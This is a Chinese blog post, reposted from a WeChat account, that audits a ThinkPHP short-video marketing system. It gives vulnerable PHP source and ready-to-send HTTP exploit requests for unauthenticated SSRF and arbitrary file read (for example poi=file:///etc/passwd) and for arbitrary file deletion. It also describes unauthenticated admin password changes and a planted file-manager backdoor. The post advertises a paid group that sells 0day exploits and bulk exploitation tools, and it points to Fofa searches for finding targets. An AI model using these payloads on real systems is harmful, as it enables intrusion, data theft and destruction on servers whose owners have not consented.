某短视频矩阵营销系统前台RCE漏洞审计

admin 2025年4月19日20:49:37评论8 views字数 6350阅读21分10秒阅读模式
某短视频矩阵营销系统前台RCE漏洞审计

点击上方蓝字关注我们 并设为星标

0x00 前言

Fofa语句:请见文末

某短视频矩阵营销系统前台RCE漏洞审计

搭建完之后长这样.  ThinkPHP框架,需要将目录设置为Public.

这套系统洞挺多的,大家可以研究学习一下

某短视频矩阵营销系统前台RCE漏洞审计

目录结构 控制器全都是简单的eval加密:

某短视频矩阵营销系统前台RCE漏洞审计

某短视频矩阵营销系统前台RCE漏洞审计

0x01 前台任意文件读取+SSRF

在 /application/admin/controller/userinfo.php 控制器中的poihuoqu方法,存在curl_exec函数,传参可控,未加鉴权,且结果直接回显,导致任意文件读取和SSRF漏洞.

/*获取POI*/public function poihuoqu(){    $poi =  input('post.poi');    $url = trim($poi);    $info = curl_init();    curl_setopt($info,CURLOPT_RETURNTRANSFER,true);    curl_setopt($info,CURLOPT_HEADER,0);    curl_setopt($info,CURLOPT_NOBODY,0);    curl_setopt($info,CURLOPT_SSL_VERIFYPEER,false);    curl_setopt($info,CURLOPT_SSL_VERIFYPEER,false);    curl_setopt($info,CURLOPT_SSL_VERIFYHOST,false);    curl_setopt($info,CURLOPT_URL,$url);    $output = curl_exec($info);    curl_close($info);    //$id = stripos($output,"poi_id=");    $on = mb_stripos($output,"poi_id=");    $er = mb_stripos($output,"&");    $poiid = mb_substr($output,$on+7,$er-$on-7);    if($output){        return json(['code'=>1,'msg'=>$poiid]);    }else{        return json(['code'=>-1,'msg'=>'获取失败']);    }}

Linux读取 Payload:

POST /index.php/admin/Userinfo/poihuoqu HTTP/2Host127.0.0.1Cache-Control: max-age=0Sec-Ch-Ua: "(Not(A:Brand";v="8""Chromium";v="101"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneContent-Type: application/x-www-form-urlencodedSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 22poi=file:///etc/passwd

某短视频矩阵营销系统前台RCE漏洞审计Windows读取 Payload:

POST /index.php/admin/Userinfo/poihuoqu HTTP/2Host127.0.0.1Cache-Control: max-age=0Sec-Ch-Ua: "(Not(A:Brand";v="8""Chromium";v="101"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneContent-Type: application/x-www-form-urlencodedSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 22poi=file:///C:/Windows/win.ini
某短视频矩阵营销系统前台RCE漏洞审计

Dict协议打内网Redis:

某短视频矩阵营销系统前台RCE漏洞审计

0x02 前台任意文件删除

在 /static/admin/upload_file/php/remove_file.php 中存在unlink函数,且$file参数可控,导致任意文件删除,这里不多说了.

<?php   if(isset($_POST['file'])){  $file '../uploads/' . $_POST['file'];if(file_exists($file)){  unlink($file);}}?>

Payload:

POST /static/admin/upload_file/php/remove_file.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 12Content-Type: application/x-www-form-urlencodedCookie: BJYSESSION=oorquahq7r9csc3can1hpcjkj3; PHPSESSID=6kqil2pldpq19cq7dt590uc54h; KOD_SESSION_SSO=ni6912a1a0d53k4rb6r6hgrhof; KOD_SESSION_ID_1bcdf=d358i7lc74rt2mrush7aao808hHost127.0.0.1:81Origin: http://127.0.0.1:81Referer: http://127.0.0.1:81/static/admin/upload_file/php/remove_file.phpSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="123""Not:A-Brand";v="8""Chromium";v="123"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1file=aaa.txt

0x03 前台未授权操纵+信息泄露漏洞

在 /application/admin/controller/xxxx.php 控制器中的xxxx方法直接GET获取page,然后查询数据表并直接将账号密码列出,并且未加鉴权函数.

Payload:

请见文末
某短视频矩阵营销系统前台RCE漏洞审计

在 **** 方法中,可随意操纵任意账户,更改密码等操作

直接访问 /index.php/admin/****/1 即可直接越权更改管理员密码

某短视频矩阵营销系统前台RCE漏洞审计
某短视频矩阵营销系统前台RCE漏洞审计

控制器不加任何鉴权,随便操纵用户,这套程序真抽象......

在 upload_add 方法中,还有个文件上传,但是无回显,上传文件以微秒的md5来命名,所以实际利用价值比较低,这里就不多赘述了 .

public functionupload_add(){  $file request()->file('image');  if(!$file){    $this -> error('请选择上传的图片');  }  $info $file->move(ROOT_PATH . 'public' . DS . 'uploads/images');  if($info){    $data array(      'image'        =>$info->getSaveName(),      'uid'          =>session('uid'),    );    $id input('post.id');    if(empty($id)){      $list Db::name('img')->insert($data);    }else{      $list Db::name('img')->where('id',$id)->update($data);    }    if($list){      $this -> success('上传成功',url('upload'));      // echo $info->getSaveName();    }else{      $this -> error('上传失败');    }  }else{    echo $file->getError();  }}

0x04 前台任意文件上传1

Payload:

请见文末
某短视频矩阵营销系统前台RCE漏洞审计

0x05 前台任意文件上传2

Payload:

请见文末
某短视频矩阵营销系统前台RCE漏洞审计

0x06 前台任意文件上传3

Payload:

请见文末

某短视频矩阵营销系统前台RCE漏洞审计

0x07 某道云后门

访问 /static/******/index.php 直接能访问到可道云,版本为4.48,99%是开发者或者资源网的后门......

某短视频矩阵营销系统前台RCE漏洞审计

账号密码存在 /static/******/system_member.php 中

<?php exit;?>{    "1": {        "name""admin",        "path""admin",        "password""请见文末",        "userID""1",        "role""1",        "config": {            "sizeMax""0",            "sizeUse"1024        },        "groupInfo": {            "1""write"        },        "createTime"1653827726,        "status"1,        "lastLogin"1655653441    },    "100": {        "userID""100",        "name""demo",        "password""请见文末",        "role""2",        "config": {            "sizeMax"5,            "sizeUse"1048576        },        "groupInfo": {            "1""write"        },        "path""demo",        "status"1,        "lastLogin"1711702666,        "createTime"1653827726    },    "101": {        "userID""101",        "name""guest",        "password""请见文末",        "role""100",        "config": {            "sizeMax"0.1,            "sizeUse"1048576        },        "groupInfo": {            "1""read"        },        "path""guest",        "status"1,        "lastLogin""",        "createTime"1653827726    }}

可道云能干什么我就不多说了,有兴趣可以自己去研究(读取数据库文件啥的,admin权限可以上传php文件):

某短视频矩阵营销系统前台RCE漏洞审计

0x08 完整报告下载

完整Exp及源码已放在知识星球中,需要可自取!!!

质量漏洞利用研究,代码审计圈子,每周至少更新三个0Day/Nday及对应漏洞的批量利用工具,团队内部POC,源码分享,星球不定时更新内外网攻防渗透技巧以及最新学习,SRC研究报告等。

【圈子权益】

1,一年至少999+漏洞Poc及对应漏洞批量利用工具

2,各种漏洞利用工具及后续更新,渗透工具、文档资源分享

3,内部漏洞库情报分享(目前已有150000+poc,会每日更新,包括部分未公开0/1day)

4,加入内部微信群,遇到任何技术问题都可以进行快速提问、讨论交流;

5Fofa API 高级会员Key共享

6,  高自动化代码审计工具共享

圈子目前价格为已涨价至129,现在星球有900+位师傅相信并选择加入我们

网站源码及漏洞库已于2025.4.2日更新

某短视频矩阵营销系统前台RCE漏洞审计Fofa 高级会员 Key

某短视频矩阵营销系统前台RCE漏洞审计
超多审计资料,自动化审计工具
某短视频矩阵营销系统前台RCE漏洞审计
某短视频矩阵营销系统前台RCE漏洞审计

某短视频矩阵营销系统前台RCE漏洞审计

圈子内部漏洞库(日更)

某短视频矩阵营销系统前台RCE漏洞审计

每篇文章均有完整指纹和详细POC

某短视频矩阵营销系统前台RCE漏洞审计

一起愉快地刷分

某短视频矩阵营销系统前台RCE漏洞审计某短视频矩阵营销系统前台RCE漏洞审计某短视频矩阵营销系统前台RCE漏洞审计

上千套审计源码,包括各种协同办公OA

入圈之后可私信我帮你开通永久VIP,已开通各大源码站VIP

某短视频矩阵营销系统前台RCE漏洞审计
某短视频矩阵营销系统前台RCE漏洞审计
高质量代码审计社区
某短视频矩阵营销系统前台RCE漏洞审计

标签:代码审计,0day,渗透测试,系统,通用,0day,转转

PS:关注公众号,持续更新漏洞文章

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):某短视频矩阵营销系统前台RCE漏洞审计

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月19日20:49:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某短视频矩阵营销系统前台RCE漏洞审计https://cn-sec.com/archives/3978187.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息